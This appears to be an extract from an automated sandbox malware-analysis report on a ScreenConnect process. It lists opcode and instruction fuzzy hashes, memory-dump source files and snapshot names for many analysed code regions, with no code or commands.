                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e35c64e1be66612e406871142daebf4435cfc092b8ad69d39908e109a503905e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E31A231B502115F8709EB7DA84455FB7E6FBC82103518A68D916EB348EF70ED05CBE4
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: LRkq
                                                                                                                                                                                                                                                  • API String ID: 0-1052062081
                                                                                                                                                                                                                                                  • Opcode ID: df3c958411d0961296204f61804c53445f75225a8874d581392958a887e0d566
                                                                                                                                                                                                                                                  • Instruction ID: 4a951c906dd1bc748fe49b0f06cd4dfe70caec2b0893d76070d9942b5a710b98
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df3c958411d0961296204f61804c53445f75225a8874d581392958a887e0d566
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C721E231B002059FD7299FA4CC59BAFBAB6BBC8310F18846DE502A72D4EE719C00CB61
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2948084594.0000000004290000.00000040.00000800.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4290000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                                  • Opcode ID: 202df0619f6622e37de5eb8f3b503d03eaab34ff6d70465859c9b62593e50df1
                                                                                                                                                                                                                                                  • Instruction ID: d5af013048a5bb5116047859a157877cb860ce7f1baca3cf500b5763af1af497
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 202df0619f6622e37de5eb8f3b503d03eaab34ff6d70465859c9b62593e50df1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 611122B18002498FCB20DF9AC585BDEBBF4EB48324F248459D568A7350D379A945CFA5
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $kq
                                                                                                                                                                                                                                                  • API String ID: 0-3037731980
                                                                                                                                                                                                                                                  • Opcode ID: ff1ca00d3dfbbbd1bfd6d82280528789ee6fd6a051ea6f04890663c0720c1f6a
                                                                                                                                                                                                                                                  • Instruction ID: 021f2d1d294eee51f0ac71349e1b7e926e26a1ccbe4df28d3b1530dd05d84e4b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff1ca00d3dfbbbd1bfd6d82280528789ee6fd6a051ea6f04890663c0720c1f6a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DFE08C706882508FD73ACF68E8816413BB4FF4620235701D6D908CB27BD331D806C702
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c5868d6cac8c6f0cbb970409fa042f1eb6bf35e3a987365b4784394f32ba0c9a
                                                                                                                                                                                                                                                  • Instruction ID: 118c3efe064df8ad44c87456fe78979a80f1ab5124db4cfb985e571384d9e74d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5868d6cac8c6f0cbb970409fa042f1eb6bf35e3a987365b4784394f32ba0c9a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4F0E5312042485FC7049B79EC01AAE7BA5EBC612074CC9AAD545CB756DA65E80787D4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2a927aa16144ff0343832906756de8b0ab15b5e690bec706fbab1d0eabcfd256
                                                                                                                                                                                                                                                  • Instruction ID: 92a44398c57e6a2a28b55ec5bd055eff31695adeb4de8a26fa78308b45c2211a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a927aa16144ff0343832906756de8b0ab15b5e690bec706fbab1d0eabcfd256
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A012B7250C2944FC7019F38DC512A93BA5DF97110B4D44EAD485CF797EA19D80BC7A5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 44347e90523f8d2be49ac0912ab8ec7efb5e09ca35bd2730a838ea8e07fd45c1
                                                                                                                                                                                                                                                  • Instruction ID: e38231263330ed3b311d44ba8dcbcbd112ce494a1c92b69cfb515cd62bb8a297
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44347e90523f8d2be49ac0912ab8ec7efb5e09ca35bd2730a838ea8e07fd45c1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0026935A107198FCB15DF68C840A9AB7F2FF89300F118699D549AB361EB71EE85CF81
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 808ba01342884037c3f453daa2e5be0a7bb43c46e8898a3089ae052a359f35af
                                                                                                                                                                                                                                                  • Instruction ID: f9ddeb6785dbc09f8d0a19ce6bb6cc270b2f6db78aaf3bd608c47307eae24b4c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 808ba01342884037c3f453daa2e5be0a7bb43c46e8898a3089ae052a359f35af
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68A13C34B402058FDB18DFA8D598A9DBBF2EF88310F5185A8E406AB369DB35EC41CF50
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d26b25b9edb7e168903c5360115f8648b83f0e75e11b79c9ddafd2324a8a2ebe
                                                                                                                                                                                                                                                  • Instruction ID: b28290dbbb7b1af260c1111ff411b4f6cb149618f6a19e1d2b243515ee8aaf03
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d26b25b9edb7e168903c5360115f8648b83f0e75e11b79c9ddafd2324a8a2ebe
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C61B0347002028FDB15EF6CD98496EB7E6EF8931471584A9E546CB32AEB34EC02CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 6ffb88764b762e4a1142dac9661d47a736bca2439cc93a656acfb75cbb93f8c6
                                                                                                                                                                                                                                                  • Instruction ID: 74f32b9f9278cc76e1ec373331982e9c25215984eadbedb43d627f17cbf6cb26
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ffb88764b762e4a1142dac9661d47a736bca2439cc93a656acfb75cbb93f8c6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF518E347002068FDB19EF6CD98492EB7E6EF88304B5585A9E546DB369DB34EC01CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c6fabe1e9c5476a5f74d1d0481f99d3f4d99596d25eddab115a529cf94ab265d
                                                                                                                                                                                                                                                  • Instruction ID: eee86c30dad49fc455151e18a2b9ac8b5fa0b42375b2ca7e74b3271512075569
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6fabe1e9c5476a5f74d1d0481f99d3f4d99596d25eddab115a529cf94ab265d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F51D5307102068FD769EB38D954A6EB7E6EFC9214B5184B8E506DB368EF34EC05CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 8a7c99f7ff30026da9492009466fe93e36b84b2f44068ebdaed523e5b0460e7f
                                                                                                                                                                                                                                                  • Instruction ID: 399691bfdb205e50bafd3af5cae908fc926600b84db8defcd4fc0525413f2b1b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a7c99f7ff30026da9492009466fe93e36b84b2f44068ebdaed523e5b0460e7f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40510930600A01CFD734CF29D894A56B7F2FF89325B555A5CE49A9B7A8DB31F805CB44
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 0f645ae9a649f17b2399e36b8a45f1921c7dce1efc1be9e1c223a9d00cdfbb10
                                                                                                                                                                                                                                                  • Instruction ID: 453bba7e98f3ab9205d23b66a905098d3831368e0f9087ee2570b7d2da576b9c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f645ae9a649f17b2399e36b8a45f1921c7dce1efc1be9e1c223a9d00cdfbb10
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C51C2707102028FD769EB38D954A6EB7E2EFC9200B5584A8D506DB3A9EF74EC05CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e1eb1a505dd8dbcd0194b8ce65a4b100ec2db5ada277dbaa892ebe32ab6c55e7
                                                                                                                                                                                                                                                  • Instruction ID: 5f00d91e62ede13006f9efae81d376202448fc94496bcf0d84ca08aef7583655
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1eb1a505dd8dbcd0194b8ce65a4b100ec2db5ada277dbaa892ebe32ab6c55e7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B518A70E403499FDB05DFB8D854B9DBBB2FF88300F108659E504AB395EB74A999CB50
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e3faef8a55f8b945e81a95e0768d5e19d972594b23656dd11d0e7d9674e5472f
                                                                                                                                                                                                                                                  • Instruction ID: 09ee0a3f0010d5c2f1965c3be12ef5d5631fa579a7d612b765546629878dfb6a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3faef8a55f8b945e81a95e0768d5e19d972594b23656dd11d0e7d9674e5472f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B515870E402099FDB05DFB8D844BDDBBB2FF88300F108659E104AB3A4DB75A999CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d9d43e70e3e2600678a4f7dfc85fc0d9d1dc6f5b95546cc4d1fc6f6a3714ec7c
                                                                                                                                                                                                                                                  • Instruction ID: f02a2e451a70fefd3a82301d9cc455d59096b814c71557f432f7b4a704d10eb7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9d43e70e3e2600678a4f7dfc85fc0d9d1dc6f5b95546cc4d1fc6f6a3714ec7c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B941D0307102028FD769EF38C954A6EB7E2EFC9200B5584A8E506CB369EF74DC45CB80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 77ce366614e60ab115a0102905bd0efed04771ce44cfcf3753d6a53951e44e3a
                                                                                                                                                                                                                                                  • Instruction ID: 0c8b0aacd72b6aea77d0390ae573e5092233dcfe037f6cdcc8c59c761265d0c5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77ce366614e60ab115a0102905bd0efed04771ce44cfcf3753d6a53951e44e3a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9341A571E002099FDB19DFA9C980AEEBBB5EF89700F158169E501B7354DB70AD46CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 87dae86f2acecd665fc8b1412a0b5ec23d046334462c9a2735d7c4d1be7f78d1
                                                                                                                                                                                                                                                  • Instruction ID: 677c04b5edd09ef7dbd2e13afc72a62f3e39b99e0cec2d5324a3fbe704c2e914
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87dae86f2acecd665fc8b1412a0b5ec23d046334462c9a2735d7c4d1be7f78d1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2841A1317206018FDB18DF68D854AADBBF2FF88214B1145A8E416EB3A4DF30ED09CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3259f90d6daf22a8fb33761903585210bbdd2afe6eecaa3b9a8ee0fc2e9f05db
                                                                                                                                                                                                                                                  • Instruction ID: e306047eead6cae498e696e1f6e4c9005497b865791a30db39ec8782260b15f1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3259f90d6daf22a8fb33761903585210bbdd2afe6eecaa3b9a8ee0fc2e9f05db
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5319231B201058FEB189FA9C4546AEFBF6EF89355F1184AAE506E7358DF31DD048B90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 78dfe0173f3c554fbedf420e129943e34bd6572cee18f3c6c315752ac9bb1618
                                                                                                                                                                                                                                                  • Instruction ID: 455c9e48f1a2db99827b46bb2826221fc63922b75316e46d12507cd9149eab08
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78dfe0173f3c554fbedf420e129943e34bd6572cee18f3c6c315752ac9bb1618
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19417F317206118FDB18DF69D854A6EBBF6FF88614B1545A8E406E73A4DF30EC04CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 6baeb6096d6a0f106f62db97bf50cc1b59c72d9102d2bb078a5930891be2f0af
                                                                                                                                                                                                                                                  • Instruction ID: e0e7e7daf64d2135278e1fa23cb5ce3043bcefaea2fb52e9830286c3416fd0ea
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6baeb6096d6a0f106f62db97bf50cc1b59c72d9102d2bb078a5930891be2f0af
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB31B070600B018FCB34CF69C84865ABBF1EF86310F554B9DD0969B6A9D770E94ACF80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 552ebf43a8d68486bdb2728e01135cb11c5d4f0960c3f90c33a89a053d1c107d
                                                                                                                                                                                                                                                  • Instruction ID: 14ee428a99528c4faed32eb08089b245e085f6bcb2b1020eefdaff60323e9c71
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 552ebf43a8d68486bdb2728e01135cb11c5d4f0960c3f90c33a89a053d1c107d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D317CB2D002099FCB24DFA9D444ADEBFF4EF88320F14846AD419A7350DB78A945CFA4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: a766087de7c2d65c97ab85c77bb7943676de21f78edec7cc26e1ecf7985c9068
                                                                                                                                                                                                                                                  • Instruction ID: 54391f016f3436605e2559b4e4ffc2b0fc60804a8aef90bf3388de0fe1076a41
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a766087de7c2d65c97ab85c77bb7943676de21f78edec7cc26e1ecf7985c9068
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA313A306007058FD734DF2AC844A6ABBF1EF89314B554A6CE496DB7A9D770E946CF80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5896546985b688c665bc33509ce7513cc2b90ec664ca8f7f22adbbfb275f47bc
                                                                                                                                                                                                                                                  • Instruction ID: 7399ba992a9a74a2feaf55ee0e080cf86839a033a7afc600b50355383784a187
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5896546985b688c665bc33509ce7513cc2b90ec664ca8f7f22adbbfb275f47bc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3313970600B058FD734DF69C84865ABBF1EF89310B514B68D0969B6A9D770E94ACF80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3533841b06ad140a86f46e31393b86950c8a3a37004e72d4e76d67677a412abd
                                                                                                                                                                                                                                                  • Instruction ID: 52dfe926fa3ee2a71718ba654f20143df29c4d2a02c04fcad7a46dcb8e07df3e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3533841b06ad140a86f46e31393b86950c8a3a37004e72d4e76d67677a412abd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5315675A00205DFCB04DFB4DD489AEBBF5FF4922070485AAD906D7355EB30AD10CB61
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d920a08639b0fe05751416dfa3af864bf750bc864c593b247ff7266ef4c8c82c
                                                                                                                                                                                                                                                  • Instruction ID: 53a61e0094ce0ec801f0c49b68b6a091f13d097503ada39f5b0742ea8c900e2f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d920a08639b0fe05751416dfa3af864bf750bc864c593b247ff7266ef4c8c82c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4731CE307103059FC705DB68D9858AEBBB1FF89310B1185AAE509DB365DB30EC05CBA1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ddc9adf7ffce243965f525f0bbaba1fc6b380708ed29e05cdda820ad486fa42d
                                                                                                                                                                                                                                                  • Instruction ID: 3a3295b47fa2a3f5a82fa2e99a384ff0991bd9c4c066af395201427f5ce4b4bc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddc9adf7ffce243965f525f0bbaba1fc6b380708ed29e05cdda820ad486fa42d
